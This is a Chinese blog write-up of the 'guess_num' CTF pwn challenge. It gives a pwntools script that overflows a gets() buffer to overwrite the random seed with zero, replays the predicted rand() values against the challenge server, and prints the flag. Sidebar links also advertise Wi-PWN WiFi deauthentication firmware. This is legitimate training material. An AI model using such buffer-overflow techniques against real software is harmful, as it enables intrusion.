攻防世界pwn【guess_num】

已于 2023-10-30 19:02:35 修改
阅读量110 收藏
点赞数
文章标签: 算法 c语言 程序员创富
于 2023-10-30 19:01:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SUOYE_GUANXING/article/details/134125580
版权

下载文件;使用ida64打开;

看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;

好像不太行;

#include <stdio.h>
#include <stdlib.h>

int main()
{
    int a,b;
    srand(0);
    for (size_t i=0;i<10;i++)
    {
        b = rand()%6+1;
        printf("%d\n",b);

    }
    system("pause");
    return 0;
}
输出结果为:
['2','5','4','2','6','2','5','1','4','2']

进入gets漏洞点看;

0x30-0x10 ; 需要0x20个字符来让它溢出;

from pwn import *
p = remote("61.147.171.105",50106)

payload = b'a' * (0x30 - 0x10) + p64(0)
p.sendlineafter("Your name:", payload)#上传达到溢出;
rand = ['2','5','4','2','6','2','5','1','4','2']
for i in range(10):
	p.sendlineafter("Please input your guess number:",rand[i].encode())#这里看别的大佬的博客,然后进行了尝试一下,加与不加都可以;
p.interactive()

flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}

SHUOYE_GUANXING
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
攻防世界 guess_num
09-27 1041
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
[攻防世界]guess_num
逆向萌新的博客
06-01 678
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
PWN做题笔记4-guess_num(已修订)
qq_40923256的博客
04-19 395
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1 如图,程序为64位ELF文件 安全机制全部开启,不太可能是注入地址 程序的功能为输入用户名,之后猜10个数,全部猜对可以获取flag main函数用户名存在注入点 查看栈结构可以发现用户名可以覆盖随机数种子 构造输入:b"A"*(0x20)+p32(0),随机数种子为0 以相同的...
Python案例之猜数字
My_YueR的博客
07-05 1294
案例主要要求是在一定范围内生成一个随机数,的用户可以自行决定游戏难度并且猜错了会有猜大了或是猜小了的提醒。用户必须在规定次数内猜出数字否者挑战失败。这里我们要考虑到如果用户输入了一个非数字报错的情况,我们采用异常处理的方法来让用户进行重新输入。如下生成随机数:#引入生成随机数的模块import random#程序设定生成 1-20 之间的一个随机数num = random.randint(1,20)如下进行异常处理: try: # 这里使用异常判断,若用户输入的不为数字则重新输入并且扣除一次
攻防世界pwn新手区guess_num
weixin_46711318的博客
08-09 573
最近重新回去看新手区的题目时发现一个挺有趣的东西,就是猜随机数,这里涉及到libc库中的rand()和srand()函数的应用,所以在讲题目之前我想先讲一下rand()和srand()函数的概念。 rand()函数会生成随机数,但这个随机数并不是真的随机数,由于周期比较长,他们只是在一定范围内随机,因此在调用rand()函数之前,可以使用srand()函数设置随机数种子,如果没有设置随机数种子,rand()函数在调用时,自动设计随机数种子为1。而srand()中的种子seed通常会用time(0)或geyp
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 624
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
guess_num.py
08-11
自己用python 写了个非常简单的入门小游戏,猜数字,可以修改源码,加大难度,挺好玩的 玩法如下: 1、系统随机给出一个1-20的数字 2、玩家来猜,共5次机会,猜对后提示: !!Great,you guess the num! 用完5次机会还没猜对,提示: Your retry times>5,Game over! 3、期间会有提示 猜的数字是偏大,还是偏小
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
攻防世界guess_num
Rt1Text的博客
03-27 507
题目 一点信息:猜数字 虚拟机里checksec
XCTF-pwn-guess_num - Writeup
菜小狗.的博客
08-11 6677
学习就是一个积累的过程 在这个过程中就是为了让迷迷糊糊的东西变得明朗起来的一个过程^_ ^ 所以往往在这个过程中会付出很多的时间来一点点积累~ 按照惯例看一下题目基本情况和它的保护情况等 开启了canary,不能直接栈溢出咯~ 下一步按照惯例该丢到ida里分析了。 可以看到sub_C3E()函数是可以调用system的 再main函数的后半段发现只要将输入的值十次v4都等于v6即可进入 su...
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1128
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
攻防世界 web题目 get_post
热门推荐
05-10 1万+
题目首先会是: 请用GET方式提交一个名为a,值为1的变量 在你用GET方式提交一个名为a,值为1的变量之后 它会显示: 请用GET方式提交一个名为a,值为1的变量 请再以POST方式随便提交一个名为b,值为2的变量 t提交后得出flag cyberpeace{a71823e37f73cda56697e31f6118ab34} 我使用hackbar这个插件十分方便的做了这个题 下面是如何...
(C++二叉树02) 翻转二叉树 对称二叉树 二叉树的深度
最新发布
qq_44962949的博客
07-17 221
【代码】(C++二叉树02) 翻转二叉树 对称二叉树 二叉树的深度。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值